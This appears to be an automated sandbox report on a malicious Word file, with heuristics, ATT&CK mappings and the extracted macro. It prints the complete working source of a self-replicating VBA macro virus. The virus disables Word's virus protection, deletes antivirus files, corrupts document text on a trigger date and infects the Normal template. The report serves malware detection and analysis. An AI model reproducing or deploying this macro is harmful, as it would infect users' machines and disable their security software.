MALICIOUS
320
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1027 Obfuscated Files or Information
T1497.001 System Checks: System Checks
The sample contains a VBA macro with an AutoClose event, indicating it executes automatically when the document is closed. The macro attempts to export itself to 'C:\Gp808.sys', delete common antivirus files, and then re-import itself, suggesting an attempt to evade detection or establish persistence. The presence of the AutoClose macro and the suspicious file operations strongly indicate malicious intent.
Heuristics 7
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
Embedded Office document has suspicious static findings critical EMBEDDED_OFFICE_CHILD_STATIC_TRIAGEA CFB/OLE Office document was found inside another file type and its carved contents matched Office exploit or payload heuristics. This catches wrapped exploit documents where the top-level file routes to a PE, archive, or generic scanner instead of Office.
-
OLE document has large unaccounted-for region high OLE_SLACK_ANOMALYOLE file is 27,636 bytes but its declared streams total only 0 bytes — 27,636 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Auto_Close macro high OLE_VBA_AUTOCLOSEAuto_Close macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
CFB header with no readable streams medium OLE_PARSE_EMPTY_STREAMSThe file begins with a valid OLE2/CFB header but exposes no directory streams. A non-empty compound document with an unreadable directory is anomalous — it is seen with truncated/corrupt files and, more importantly, with content deliberately shifted off byte boundaries to defeat parsers while the host application still recovers the object.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 7127 bytes |
SHA-256: 60d1e3e8cd1ef7227929d27b3413757706689a9897ca5c0f2b167fb5efa0f64f |
|||
|
Detection
ClamAV:
Doc.Trojan.VMPCK2-2
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "Gp808"
Sub AutoClose()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
.ScreenUpdating = False
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Application.VBE.ActiveVBProject.VBComponents("Gp808").Export "C:\Gp808.sys"
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*")
Kill ("C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*")
Kill ("C:\Programme\Norton Antivirus\V32scan.dll")
Kill ("C:\Programme\Norton Antivirus\Virscan.dat")
Kill ("C:\PROGRAMME\TBAV\TBAV.DAT")
Kill ("C:\TBAV\TBAV.DAT")
Kill ("C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*")
If Day(Now()) = 14 And Month(Now()) = 7 Then
Dim a As Variant
Dim b As Variant
Selection.WholeStory
a = Selection
For i = 1 To Len(a)
b = Mid$(a, i, 1)
c = Asc(Mid$(a, i, 1))
d = c + 29
If d > 199 Then c = 30
e$ = e$ + Chr(d)
Next i
Selection.WholeStory
Selection.Cut
WordBasic.Insert e$
End If
Set Nw807 = ActiveDocument.VBProject.VBComponents
Set Ru898 = NormalTemplate.VBProject.VBComponents
For y = 1 To Ru898.Count
If Ru898(y).Name = "Gp808" Then Nw515 = True
Next y
For y = 1 To Nw807.Count
If Nw807(y).Name = "Gp808" Then Ew593 = True
Next y
If Nw515 = True And Ew593 = True Then Exit Sub
If Nw515 = True And Ew593 <> True Then Nw807.Import "c:\Gp808.sys": ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
If Nw515 <> True And Ew593 = True Then Ru898.Import "c:\Gp808.sys": NormalTemplate.Save
End Sub
Sub ExtrasMakro()
End Sub
Sub AnsichtCode()
End Sub
Sub AnsichtVBCode()
End Sub
Sub DateiDokVorlagen()
End Sub
Sub FormatFormatvorlage()
End Sub
' Processing file: /opt/analyzer/scan_staging/ad488a73277147d19bce2b91d341ea2b.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 903 bytes
' Macros/VBA/Gp808 - 4081 bytes
' Line #0:
' FuncDefn (Sub AutoClose())
' Line #1:
' OnError (Resume Next)
' Line #2:
' LitDI2 0x0000
' Ld WordBasic
' ArgsMemCall DisableAutoMacros 0x0001
' Line #3:
' LitVarSpecial (False)
' Ld ActiveDocument
' MemSt ReadOnlyRecommended
' Line #4:
' StartWithExpr
' Ld Application
' With
' Line #5:
' Ld wdCancelDisabled
' MemStWith EnableCancelKey
' Line #6:
' Ld wdAlertsNone
' MemStWith DisplayAlerts
' Line #7:
' LitVarSpecial (False)
' MemStWith ScreenUpdating
' Line #8:
' EndWith
' Line #9:
' StartWithExpr
' Ld Options
' With
' Line #10:
' LitVarSpecial (False)
' MemStWith ConfirmConversions
' Line #11:
' LitVarSpecial (False)
' MemStWith VirusProtection
' Line #12:
' EndWith
' Line #13:
' LitStr 0x000C "C:\Gp808.sys"
' LitStr 0x0005 "Gp808"
' Ld Application
' MemLd VBE
' MemLd ActiveVBProject
' ArgsMemLd VBComponents 0x0001
' ArgsMemCall Export 0x0001
' Line #14:
' LitStr 0x0021 "C:\PROGRAMME\MCAFEE\VIRUSSCAN\*.*"
' Paren
' ArgsCall Kill 0x0001
' Line #15:
' LitStr 0x0023 "C:\PROGRAMME\MCAFEE\VIRUSSCAN95\*.*"
' Paren
' ArgsCall Kill 0x0001
' Line #16:
' LitStr 0x0029 "C:\Programme\Norton Antivirus\V32scan.dll"
' Paren
' ArgsCall Kill 0x0001
' Line #17:
' LitStr 0x0029 "C:\Programme\Norton Antivirus\Virscan.dat"
' Paren
' ArgsCall Kill 0x0001
' Line #18:
' LitStr 0x001A "C:\PROGRAMME\TBAV\TBAV.DAT"
' Paren
' ArgsCall Kill 0x0001
' Line #19:
' LitStr 0x0010 "C:\TBAV\TBAV.DAT"
' Paren
' ArgsCall Kill 0x0001
' Line #20:
' LitStr 0x0030 "C:\Programme\Dr Solomon's\Anti-Virus Toolkit\*.*"
' Paren
' ArgsCall Kill 0x0001
' Line #21:
' ArgsLd Now 0x0000
' ArgsLd Day 0x0001
' LitDI2 0x000E
' Eq
' ArgsLd Now 0x0000
' ArgsLd Month 0x0001
' LitDI2 0x0007
' Eq
' And
' IfBlock
' Line #22:
' Dim
' VarDefn a (As Variant)
'
... (truncated)
|
|||
embedded_office_off0000260c.ole |
embedded-office | Embedded OLE/CFB Office body inside ole container at offset 0x260C | 27636 bytes |
SHA-256: 8f015d5d32149a30a9979e4e4f24e77a47790979e9e567b122f776485d15742b |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.